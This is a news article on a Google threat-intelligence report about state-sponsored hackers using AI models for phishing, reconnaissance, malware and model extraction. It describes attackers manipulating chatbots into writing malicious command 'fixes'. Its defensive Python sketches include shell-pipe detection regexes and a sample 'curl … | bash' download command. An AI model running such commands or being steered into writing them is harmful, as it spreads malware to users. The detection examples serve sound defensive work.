State-sponsored hackers are using AI tools to accelerate their cyberattacks, with threat actors from Iran, North Korea, China, and Russia using models such as Google’s Gemini to craft sophisticated phishing campaigns and develop malware, according to a new report from Google’s Threat Intelligence Group (GTIG).

The quarterly AI Threat Tracker report, released today, reveals how government-backed threat actors have begun leveraging artificial intelligence across the attack lifecycle, from reconnaissance and social engineering through to malware development. The findings draw on GTIG’s investigations during the final quarter of 2025.

“For government-sponsored attackers, large language models have become essential tools for technical research, targeting, and the rapid generation of subtle phishing lures,” GTIG researchers said in the report.

State-sponsored hacker reconnaissance targets defense sector

Iranian threat actor APT42 reportedly used Gemini to enhance reconnaissance and targeted social engineering operations. The group used AI to create official-looking email addresses for specific organizations and conducted research to establish a credible pretext for approaching targets.

APT42 also used the model to create personas and scenarios designed to better engage targets, to translate between languages, and to produce natural, native-sounding phrasing that avoids traditional phishing red flags such as poor grammar or awkward syntax.

UNC2970, a North Korean government-backed group that focuses on targeting the defense sector and impersonating corporate recruiters, used Gemini to profile high-value targets. The group’s reconnaissance included searching for information on major cybersecurity and defense companies, mapping specific technical job roles, and gathering salary information.

“This activity blurs the distinction between routine professional investigation and malicious reconnaissance, as attackers gather the necessary components to create customized, high-fidelity phishing personas,” GTIG noted.

Model extraction attacks are on the rise

Beyond operational misuse, Google DeepMind and GTIG have identified an increase in model extraction attempts, also known as “distillation attacks,” aimed at stealing intellectual property from AI models.

One campaign targeting Gemini’s reasoning abilities involved more than 100,000 prompts designed to force the model to output its reasoning process. The breadth of the questions suggested an attempt to replicate Gemini’s reasoning abilities across a variety of tasks in non-English target languages.

Although GTIG did not observe direct attacks on frontier models by advanced persistent threat (APT) actors, the team identified and thwarted frequent model extraction attacks by private companies and researchers around the world who were looking to clone proprietary logic.

Google’s systems recognized these attacks in real time, and the company has implemented defenses to protect the model’s internal reasoning traces.

AI-integrated malware emerges

GTIG observed a malware sample tracked as HONESTCUE that uses Gemini’s API to outsource the generation of its functionality. The malware is designed to evade traditional network-based detection and static analysis through a multi-layered obfuscation approach.

HONESTCUE acts as a downloader and launcher framework that sends prompts via Gemini’s API and receives C# source code in response. The fileless second stage compiles and executes the payload directly in memory, leaving no artifacts on disk.
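
For defenders, one possible starting point is to look for unexpected software contacting a generative AI API. The sketch below is illustrative only and is not drawn from the GTIG report: the `Connection` record, the `ALLOWED_PROCESSES` allowlist, and the process names are all hypothetical, and the hostname is assumed to be the public Gemini API endpoint. It simply lists processes outside an allowlist that were seen connecting to that host.

```python
from dataclasses import dataclass

# Assumed public hostname of the Gemini API; verify against your own telemetry.
GEMINI_API_HOST = "generativelanguage.googleapis.com"

# Hypothetical allowlist of software expected to call the API in this environment.
ALLOWED_PROCESSES = {"chrome.exe", "approved-ai-client.exe"}


@dataclass(frozen=True)
class Connection:
    """One outbound connection record (hypothetical log schema)."""
    process: str
    host: str


def unexpected_ai_api_callers(events: list[Connection]) -> list[str]:
    """Return sorted names of non-allowlisted processes that contacted the API host."""
    return sorted(
        {
            event.process
            for event in events
            if event.host.lower() == GEMINI_API_HOST
            and event.process.lower() not in ALLOWED_PROCESSES
        }
    )


events = [
    Connection("chrome.exe", "generativelanguage.googleapis.com"),
    Connection("updater.exe", "generativelanguage.googleapis.com"),
    Connection("updater.exe", "example.com"),
]
print(unexpected_ai_api_callers(events))
```

A match is only a lead for investigation, since legitimate tools may also call the API, and an allowlist like this would need tuning for each environment.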

Separately, GTIG identified COINBAIT, a phishing kit whose construction may have been accelerated by AI code generation tools. The kit, built using the AI-powered platform Lovable AI, masquerades as a major cryptocurrency exchange to collect credentials.

ClickFix campaign exploits AI chat platforms

In a new social engineering campaign first seen in December 2025, GTIG observed threat actors abusing the public sharing features of generative AI services such as Gemini, ChatGPT, Copilot, DeepSeek, and Grok to host deceptive content that distributes ATOMIC malware targeting macOS systems.

Attackers manipulated AI models into creating realistic-looking instructions for common computer tasks and embedded malicious command-line scripts as “solutions.” By creating shareable links to these AI chat transcripts, the attackers used a trusted domain to host the first stage of the attack.
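
As a rough illustration of how a security team might screen commands copied from a shared chat before anyone runs them, the following sketch flags two common "download or decode, then pipe to a shell" shapes. The patterns and the `flag_risky_commands` helper are hypothetical examples chosen for this article, not indicators published by GTIG, and they would miss many variants.

```python
import re

# Hypothetical heuristics for illustration; not indicators from the GTIG report.
RISKY_PATTERNS = {
    # e.g. "curl ... | bash" or "wget ... | sudo sh"
    "pipe_to_shell": re.compile(
        r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"
    ),
    # e.g. "echo <blob> | base64 -d | sh"
    "base64_to_shell": re.compile(
        r"base64\s+(?:-d|-D|--decode)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"
    ),
}


def flag_risky_commands(text: str) -> list[str]:
    """Return the names of the heuristic patterns that match the given text."""
    return [name for name, pattern in RISKY_PATTERNS.items() if pattern.search(text)]


print(flag_risky_commands("curl -fsSL https://example.invalid/fix.sh | bash"))
print(flag_risky_commands("ls -la ~/Documents"))
```

Pattern matching of this kind is easy to evade, so it is better treated as a prompt for a closer look than as a verdict.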

Underground marketplaces thrive on stolen API keys

GTIG’s observations of English- and Russian-language underground forums indicate strong demand for AI-enabled tools and services. However, state-sponsored hackers and cybercriminals have struggled to develop custom AI models and instead rely on mature commercial products that they access via stolen credentials.

One of the toolkits, Xanthorox, advertised itself as a custom AI for autonomous malware generation and phishing campaign development. GTIG’s investigation revealed that Xanthorox is not a custom-built model, and is actually powered by several commercial AI products, including Gemini, which are accessed via stolen API keys.
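
Because stolen keys are what make services like this possible, teams may want to check their own code and configuration for exposed credentials. The sketch below is a minimal example under stated assumptions: it relies on a key shape widely used by community secret scanners (the prefix `AIza` followed by 35 URL-safe characters), which is a heuristic rather than an official specification, and `find_candidate_keys` is a hypothetical helper name. It reports line numbers and a redacted prefix only.

```python
import re

# Heuristic key shape used by many community secret scanners (an assumption,
# not an official format definition): "AIza" plus 35 URL-safe characters.
KEY_SHAPE = re.compile(
    r"(?<![0-9A-Za-z_\-])AIza[0-9A-Za-z_\-]{35}(?![0-9A-Za-z_\-])"
)


def find_candidate_keys(text: str) -> list[tuple[int, str]]:
    """Return (line_number, redacted_prefix) for each string shaped like an API key."""
    findings = []
    for line_number, line in enumerate(text.splitlines(), start=1):
        for match in KEY_SHAPE.finditer(line):
            # Keep only the first six characters so the report never stores the key.
            findings.append((line_number, match.group(0)[:6] + "..."))
    return findings


# Obviously fake key built for the demonstration.
sample = 'debug = True\nAPI_KEY = "AIza' + "A" * 35 + '"\n'
print(find_candidate_keys(sample))
```

Any hit should be treated as a candidate to verify and rotate, since a string can match the shape without being a live key.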

Google’s response and mitigation measures

Google took action against the identified threat actors by disabling accounts and assets associated with the malicious activity. The company has also applied the intelligence it gathered to strengthen both its classifiers and its models, allowing them to refuse assistance with similar attacks in the future.

“We are developing AI boldly and responsibly. This means taking proactive steps to stop malicious activity by disabling projects and accounts associated with bad actors, while continually improving our models to make them harder to exploit,” the report states.

GTIG emphasized that despite these developments, APTs and information operations actors have not achieved breakthrough capabilities that fundamentally change the threat landscape.

The findings highlight the evolving role of AI in cybersecurity as both defenders and attackers compete to harness the technology’s capabilities.

For corporate security teams in the Asia-Pacific region, especially where state-sponsored hackers from China and North Korea remain active, this report is an important reminder to strengthen defenses against AI-enhanced social engineering and reconnaissance operations.



(Photo provided by: SCARECROW works collection)

AI News is brought to you by TechForge Media.